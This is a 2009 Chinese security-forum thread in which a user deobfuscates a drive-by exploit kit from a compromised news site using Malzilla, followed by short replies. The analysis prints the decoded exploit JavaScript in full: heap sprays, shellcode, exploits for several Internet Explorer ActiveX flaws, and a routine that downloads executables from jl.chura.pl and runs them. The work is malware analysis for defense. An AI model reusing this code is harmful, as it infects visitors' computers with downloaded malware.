瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 使用神器(malzilla)玩转国外网马
networkedition - 2009-7-7 15:13:00
国外网马很少涉及去解密它,貌似都是很BT。尝试使用malzilla来解密一下哈,欢迎高手来拍板砖。在昨天的瑞星每日安全播报中http://read.southcn.com/good/sz/200811170004.htm(南方网 南方书城)这个网站,使用freshow分析出如下内容:

Log is generated by FreShow.
[wide]http://read.southcn.com/good/sz/200811170004.htm
    [frame]http://ZieF.pl/iraq.jpg
    [frame]http://ZieF.pl/iraq.jpg

这个iraq.jpg很可疑哟,下面使用神器来解密一下:



用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2009-7-7 15:19:00
点击Get后,弹出如下对话框,大致意思是重定向吧(E文不太好,^_^)



在这里我们点击Yes,获取到如下源文件内容:


networkedition - 2009-7-7 15:29:00
获取的源文件内容中有很多数字,类似十进制加密,使用笨办法,将源代码中数字部分复制出来。由于内容过于长,在这里就不发了。将复制出内容粘贴至在线解密工具,详见下图:

networkedition - 2009-7-7 15:41:00
在这里需要将分隔符替换为","号,使用在线解密工具十进制解密进行解密,详见下列截图:



networkedition - 2009-7-7 15:44:00
点击十进制解密按钮,解密后源代码如下:

function sleep(func,naptime){
var sleeping = true;
var now = new Date();
var alarm;
var startingMSeconds = now.getTime();
while(sleeping){
alarm = new Date();
alarmMSeconds = alarm.getTime();
if (alarmMSeconds - startingMSeconds > naptime){ sleeping = false; }
}
eval(func);
}
var m=new Array();
var mf=0;
var url="http://jl.chura.pl/rc/load.php?id=508";
function hex(num,width){
var digits="0123456789ABCDEF";
var hex=digits.substr(num&0xF,1);
while(num>0xF){
num=num>>>4;
hex=digits.substr(num&0xF,1)+hex;
}
var width=(width?width:0);
while(hex.length<width)hex="0"+hex;
return hex;
}
function addr(addr){
return unescape("%u"+hex(addr&0xFFFF,4)+"%u"+hex((addr>>16)&0xFFFF,4));
}
function unes(str){
var tmp="";
for(var i=0;i<str.length;i+=4){
tmp+=addr((str.charCodeAt(i+3)<<24)+
(str.charCodeAt(i+2)<<16)+
(str.charCodeAt(i+1)<<8)+
str.charCodeAt(i));
}
return unescape(tmp);
}
function hav(){
mf=mf;
setTimeout("hav()",1000);
}
function gss(ss,sss){
while(ss.length*2<sss)ss+=ss;
ss=ss.substring(0,sss/2);
return ss;
}
function ms(xpl){
var plc=unes(
"\x33\xC0\x64\x8B\x40\x30\x78\x0C\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B"+
"\x58\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C\x8B\x58\x3C\x6A\x44\x5A"+
"\xD1\xE2\x2B\xE2\x8B\xEC\xEB\x4F\x5A\x52\x83\xEA\x56\x89\x55\x04"+
"\x56\x57\x8B\x73\x3C\x8B\x74\x33\x78\x03\xF3\x56\x8B\x76\x20\x03"+
"\xF3\x33\xC9\x49\x50\x41\xAD\x33\xFF\x36\x0F\xBE\x14\x03\x38\xF2"+
"\x74\x08\xC1\xCF\x0D\x03\xFA\x40\xEB\xEF\x58\x3B\xF8\x75\xE5\x5E"+
"\x8B\x46\x24\x03\xC3\x66\x8B\x0C\x48\x8B\x56\x1C\x03\xD3\x8B\x04"+
"\x8A\x03\xC3\x5F\x5E\x50\xC3\x8D\x7D\x08\x57\x52\xB8\x33\xCA\x8A"+
"\x5B\xE8\xA2\xFF\xFF\xFF\x32\xC0\x8B\xF7\xF2\xAE\x4F\xB8\x65\x2E"+
"\x65\x78\xAB\x66\x98\x66\xAB\xB0\x6C\x8A\xE0\x98\x50\x68\x6F\x6E"+
"\x2E\x64\x68\x75\x72\x6C\x6D\x54\xB8\x8E\x4E\x0E\xEC\xFF\x55\x04"+
"\x93\x50\x33\xC0\x50\x50\x56\x8B\x55\x04\x83\xC2\x7F\x83\xC2\x31"+
"\x52\x50\xB8\x36\x1A\x2F\x70\xFF\x55\x04\x5B\x33\xFF\x57\x56\xB8"+
"\x98\xFE\x8A\x0E\xFF\x55\x04\x57\xB8\xEF\xCE\xE0\x60\xFF\x55\x04"+url+xpl);
var hsta=0x0c0c0c0c,hbs=0x100000,pl=plc.length*2,sss=hbs-(pl+0x38);
var ss=gss(addr(hsta),sss),hb=(hsta-hbs)/hbs;
if (mf){
for (i=0;i<hb;i++)delete m[i];
CollectGarbage();
}
for(i=0;i<hb;i++)m[i]=ss+plc;
if(!mf){
mf=1;
hav();
}
return 0;
}
function cobj(obj){
var ret=null;
if(obj.substring(0,1)=="{"){
try{
var clsid=obj.substring(1,obj.length-1);
ret=document.createElement("object");
ret.setAttribute("classid","clsid:"+clsid);
return ret;
}catch(e){
return null;
}
}else{
try{
ret=new ActiveXObject(obj);
return ret;
}catch(e){
return null;
}
}
}
var padding = "AAAA";
var heapBase = 0x00150000;
var memo;
function init(maxAlloc){
while (4 + padding.length*2 + 2 < 65535)padding += padding;
memo = new Array();
flush();
}
function flush(){
delete memo["plunger"];
CollectGarbage();
memo["plunger"] = new Array();
var bytes = new Array(32, 64, 256, 32768);
for (var i = 0; i < 6; i++) {
for(var n = 0; n < 4; n++) {
var len = memo["plunger"].length;
eval("memo[\"plunger\"][len] = padding.substr(0, (" + bytes[n] + "-6)/2);");
}
}
}
function alloc(arg, tag){
var size;
size = arg;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag] )memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = padding.substr(0, (arg-6)/2);
}
function alloc_str(arg, tag){
var size;
size = 4 + arg.length*2 + 2;
if (size == 32 || size == 64 || size == 256 || size == 32768) {}
if ( ! memo[tag])memo[tag] = new Array();
var len = memo[tag].length;
memo[tag][len] = arg.substr(0, arg.length);
}
function free(tag) {
delete memo[tag];
CollectGarbage();
flush();
}
function CreateO(o,n){
var r=null;
try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,"")}catch(e){}}
if(!r){try{r=o.CreateObject(n,"","")}catch(e){}}
if(!r){try{r=o.GetObject("",n)}catch(e){}}
if(!r){try{r=o.GetObject(n,"")}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return(r);
}
function Go(a){
var eurl=url+"&spl=7";
var fname="w32NOFJCyliz5mm5R.exe";
var fso=a.CreateObject("Scripting.FileSystemObject","")
var sap=CreateO(a,"Shell.Application");
var x=CreateO(a,"ADODB.Stream");
var nl=null;
fname=fso.BuildPath(fso.GetSpecialFolder(2),fname);
x.Mode=3;
try{nl=CreateO(a,"Micr"+"osoft.XMLH"+"TTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.XMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=CreateO(a,"MSXML2.ServerXMLHTTP");nl.open("GET",eurl,false);}
catch(e){try{nl=new XMLHttpRequest();nl.open("GET",eurl,false);}
catch(e){return 0;}}}}
x.Type=1;
nl.send(null);
rb=nl.responseBody;
x.Open();
x.Write(rb);
x.SaveTofile(fname,2);
sap.ShellExecute(fname);
return 1;
}
function attack(s){
var obj=null;
if(s==1){
var i=0;
var target=new Array("BD96C556-65A3-11D0-983A-00C04FC29E36","BD96C556-65A3-11D0-983A-00C04FC29E30","AB9BCEDD-EC7E-47E1-9322-D4A210617116","0006F033-0000-0000-C000-000000000046","0006F03A-0000-0000-C000-000000000046","6e32070a-766d-4ee6-879c-dc1fa91d2fc3","6414512B-B978-451D-A0D8-FCFDF33E833C","7F5B7F63-F06F-4331-8A26-339E03C0AE3D","06723E09-F4C2-43c8-8358-09FCD1DB0766","639F725F-1B2D-4831-A9FD-874847682010","BA018599-1DB3-44f9-83B4-461454C84BF8","D0C07D56-7C69-43F1-B4A0-25F5A11FAB19","E8CCCDDF-CA28-496b-B050-6C07C962476B",null);
while(target[i]){
var a=null;
a=document.createElement("object");
a.setAttribute("classid","clsid:"+target[i]);
if(a){try{var b=CreateO(a,"Shell.Application");if(b){Go(a);}}catch(e){}}
i++;
}
sleep("attack(4);",4000);
return 0;
}
if(s==3){
try{
obj=cobj("WebViewFolderIcon.WebViewFolderIcon.1");
if(obj){
ms("&spl=8");
for(var i=0;i<128;i++){
var wvfio=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
try{wvfio.setSlice(0x7ffffffe,0,0,202116108);}catch(e){}
var wvfit=new ActiveXObject("WebViewFolderIcon.WebViewFolderIcon.1");
}
sleep("attack(7);",2000);
return 0;
}
}catch(e){}
sleep("attack(7);",1);
return 0;
}
if(s==4){
try{
obj=cobj("{EC444CB6-3E7E-4865-B1C3-0DE72EF39B3F}");
if(obj){
ms("&spl=9");
z=Math.ceil(0x0c0c0c0c);
z=document.scripts[0].createControlRange().length;
sleep("attack(3);",2000);
return 0;
}
}catch(e){}
sleep("attack(3);",1);
return 0;
}
if(s==7){
try{
obj=cobj("{77829F14-D911-40FF-A2F0-D11DB8D6D0BC}");
if(obj){
ms("&spl=10");
var buf = "";
while (buf.length < 5000) buf += "\x0c\x0c\x0c\x0c";
obj.SetFormatLikeSample(buf);
sleep("attack(9);",2000);
return 0;
}
}catch(e){}
sleep("attack(9);",1);
return 0;
}
if(s==9){
try{
obj=cobj("DirectAnimation.PathControl");
if(obj){
ms("&spl=11");
init();
var jmpecx = 0x0c0c0c0c;
var vtable = addr(0x7ceb9090);
for (var i = 0; i < 124/4; i++)vtable += addr(jmpecx);
vtable += padding.substr(0, (1008-138)/2);
var fakeObjPtr = heapBase + 0x688 + ((1008+8)/8)*48;
var fakeObjChunk = padding.substr(0, (0x200c-4)/2) + addr(fakeObjPtr) + padding.substr(0, 14/2);
CollectGarbage();
flush();
for (var i = 0; i < 100; i++)alloc_str(vtable);
alloc_str(vtable, "lookaside");
free("lookaside");
for (var i = 0; i < 100; i++)alloc(0x2010);
for (var i = 0; i < 2; i++) {
alloc_str(fakeObjChunk);
alloc_str(fakeObjChunk, "freeList");
}
alloc_str(fakeObjChunk);
free("freeList");
obj.KeyFrame(0x40000801, new Array(1), new Array(1));
sleep("attack(10);",2000);
return 0;
}
}catch(e){}
sleep("attack(10);",1);
return 0;
}
if(s==10){
snpac();
return 0;
}
}
function xml(){
var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0035");
var spray = unescape("%u0a0a%u0a0a");
do { spray += spray; } while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; }
document.getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>";
}
function pdf(){
try {
var obj = null;
obj = new ActiveXObject("AcroPDF.PDF");
if (!obj) {obj = new ActiveXObject("PDF.PdfCtrl");}
if (obj) {document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=508' type='application/pdf'></embed>";}
} catch(e) {
document.getElementById("pdfplace").innerHTML = "<embed width='150' height='150' src='http://jl.chura.pl/rc/pdf.php?id=508' type='application/pdf'></embed>";
}
setTimeout("xml()", 100);
}
function snpac(){
var buf1 = 'http://jl.chura.pl/rc/load.php?id=508&spl=4';
try{
var obj = document.createElement('object');
obj.setAttribute('classid', 'clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');
obj.setAttribute("id", "obj");
obj.SnapshotPath = buf1;
obj.CompressedPath = 'C:\NOFCym2lizm5Rw35.exe';
obj.PrintSnapshot();
} catch(e) {}
setTimeout("pdf()", 300);
}
attack(1);


networkedition - 2009-7-7 15:53:00
简单分析一下解密后源代码内容,先来看一下这个链接http://jl.chura.pl/rc/load.php?id=508,再使用神器Get一下,弹出如下对话框,详见下列截图:



(⊙o⊙)哦,我们解密出一个load.exe。
networkedition - 2009-7-7 16:01:00
再来看一下,有个shellocode,源代码如下:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0035


在这里就不讲如何解密了,解密得到一个:
http://jl.chura.pl/rc/load.php?id=508&spl=5
再用神器Get一下
networkedition - 2009-7-7 16:03:00


也是一个load.exe
networkedition - 2009-7-7 16:12:00
再来看一下这个链接地址:http://jl.chura.pl/rc/pdf.php?id=508,貌似是个pdf文件,同样使用神器Get一下,或使用下载工具直接下载。
详见下列截图:


networkedition - 2009-7-7 16:24:00
我们点击保存,将此pdf下载下来,常规惯例使用记事本打开直接查看原文件内容,没有什么可用信息,接下来使用redoce工具解密一下,详见下列截图:

networkedition - 2009-7-7 16:34:00
在这里我们不再详细讲解这个十进制加密解密方法,具体可参见文章开头部分,解密得到两个shellcode部分:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0033


shellcode解密结果为:
http://jl.chura.pl/rc/load.php?id=508&spl=3,应该也是个load.exe
networkedition - 2009-7-7 16:37:00
下面是另外一个shellcode:


%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u6A2F%u2E6C%u6863%u7275%u2E61%u6C70%u722F%u2F63%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3035%u2638%u7073%u3D6C%u0032


解密结果为:http://jl.chura.pl/rc/load.php?id=508&spl=2
同样应该也是个load.exe

好了,至此分析完毕,欢迎高手拍板砖:kaka12:
shadowmin - 2009-7-7 17:15:00
十进制解密也可以在神器里进行,当然结果是一样的。
我不是高手,所以这不是拍砖:kaka16:
networkedition - 2009-7-7 17:20:00
ls的不错,神器没有怎么研究过,又学一招:kaka8:
gtyre2 - 2009-7-7 22:30:00
老师咋不用汉化版的:kaka6:
pigboy - 2009-7-8 10:50:00
晕忽  慢慢看下
脑~残 - 2009-7-21 13:40:00
不懂
最后灬赵丿子龙 - 2009-7-25 18:33:00
LZ讲的好。。。。。。
全没看懂。。。。。。
好啊  好
09kaka - 2009-7-29 14:19:00
:kaka1: 很好很强大!
leebye - 2009-8-2 16:25:00
不错不错,学习下
两个铁球 - 2009-8-5 0:11:00
123

不是不让我们一般会员说话吗?怎么又准了?
xuefuyuan - 2009-8-5 13:05:00
支持一下
woskywalker - 2009-8-5 17:45:00
看了下,基本懂,不过对那个解PDF和SWF的工具redoce还是不会用
重启电脑 - 2009-8-8 14:05:00
不错
支持一下:kaka1:
redbsd - 2009-8-20 14:22:00
真是好东西,谢谢了。
lnxa - 2009-8-26 16:56:00
学习一下。。
东→吴 - 2009-8-27 11:48:00
感觉好像在看天方夜潭,完全不懂。:kaka4:
Beloved1988 - 2009-8-29 21:03:00
新手,专门来学习网马解密的、、、、、
古木希 - 2009-9-7 12:55:00
拒绝木马;你我同行!:kaka1:
古木希 - 2009-9-7 12:56:00
支持以下;做的很好;继续努力!:kaka12:
12
查看完整版本: 使用神器(malzilla)玩转国外网马